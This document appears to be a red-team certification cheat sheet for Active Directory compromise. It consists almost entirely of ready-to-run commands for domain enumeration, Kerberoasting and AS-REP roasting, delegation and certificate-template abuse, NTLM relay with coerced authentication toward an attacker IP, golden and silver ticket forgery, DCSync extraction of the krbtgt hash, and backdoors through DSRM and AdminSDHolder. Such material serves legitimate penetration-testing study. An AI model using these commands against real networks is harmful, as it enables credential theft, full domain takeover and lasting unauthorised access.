Certified Red Team Expert

PowerView — Key Enumeration Commands

# Domain info
Get-Domain; Get-DomainController; Get-DomainTrust; Get-ForestTrust

# User enum
Get-DomainUser | select samaccountname, memberof, admincount, description
Get-DomainUser -SPN | select samaccountname, serviceprincipalname
Get-DomainUser -PreauthNotRequired | select samaccountname

# Group enum
Get-DomainGroup -Identity "Domain Admins" | select -ExpandProperty members
Get-DomainGroupMember -Identity "Enterprise Admins" -Recurse

# Computer enum
Get-DomainComputer -Unconstrained | select dnshostname
Get-DomainComputer -TrustedToAuth | select dnshostname,msds-allowedtodelegateto

# ACL abuse
Find-InterestingDomainAcl -ResolveGUIDs | where {$_.IdentityReference -match "lowpriv"}
Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs

# Local admin
Find-LocalAdminAccess -Verbose | select ComputerName

Kerberos Attacks with Rubeus

# Kerberoast all SPNs
.\Rubeus.exe kerberoast /outfile:hashes.txt /format:hashcat

# AS-REP Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep.txt

# Unconstrained delegation + TGT theft
.\Rubeus.exe monitor /interval:5 /targetuser:DC01$ /nowrap
# Then force authentication with SpoolSample or PetitPotam

# S4U2Self + S4U2Proxy (constrained delegation)
.\Rubeus.exe s4u /user:svc$ /rc4:HASH /impersonateuser:Administrator /msdsspn:cifs/fileserver /ptt

# Over-pass-the-Hash (pass-the-key)
.\Rubeus.exe asktgt /user:admin /rc4:NTLMhash /ptt

# Golden ticket
.\Rubeus.exe golden /user:Administrator /domain:domain.local /sid:S-1-5-21-x /rc4:KRBTGThash /ptt

ADCS (Certificate) Attacks

# Find vulnerable templates (ESC1-ESC8)
.\Certify.exe find /vulnerable
certipy find -u user@domain -p pass -dc-ip dc_ip -stdout

# ESC1 — Enroll in template with SAN + Client Auth
.\Certify.exe request /ca:domain\CA-NAME /template:VulnTemplate /altname:administrator
# Convert to PFX, then use with Rubeus:
.\Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /ptt

# ESC8 — NTLM relay to ADCS HTTP endpoint
# Start relay:
ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp --adcs --template DomainController
# Coerce auth from DC:
PetitPotam.py attacker_ip dc_ip

Cross-Forest Trust Attacks

# Enumerate trusts
Get-DomainTrust; Get-ForestTrust
Get-DomainTrust -Domain external.local
nltest /domain_trusts

# SID History abuse (SID filtering disabled)
# Get child domain SID
Get-DomainSID -Domain child.domain.local
# Forge inter-realm TGT with parent DA SID in SID history
.\Rubeus.exe golden /user:Administrator /domain:child.domain.local /sid:S-1-5-21-child-SID /rc4:KRBTGT_CHILD_HASH /sids:S-1-5-21-parent-SID-519 /ptt

# Foreign principal enumeration
Get-DomainForeignGroupMember -Domain external.local

Persistence Techniques

# Golden Ticket (requires krbtgt hash)
# Get krbtgt via DCSync:
lsadump::dcsync /domain:domain.local /user:krbtgt
# Forge (valid 10 years):
kerberos::golden /user:Administrator /domain:domain.local /sid:DOMAIN_SID /krbtgt:KRBTGT_HASH /endin:99999 /renewmax:99999 /ptt

# Silver Ticket (service-specific, no DC needed)
kerberos::golden /user:Administrator /domain:domain.local /sid:DOMAIN_SID /target:server.domain.local /service:cifs /rc4:COMPUTER_HASH /ptt

# DSRM abuse (DC local admin backdoor)
# Enable DSRM login over network:
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
# Login: domain\.\Administrator with DSRM hash

# AdminSDHolder backdoor
# Grant lowpriv user DCSync rights via AdminSDHolder ACL
Set-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity lowpriv -Rights DCSync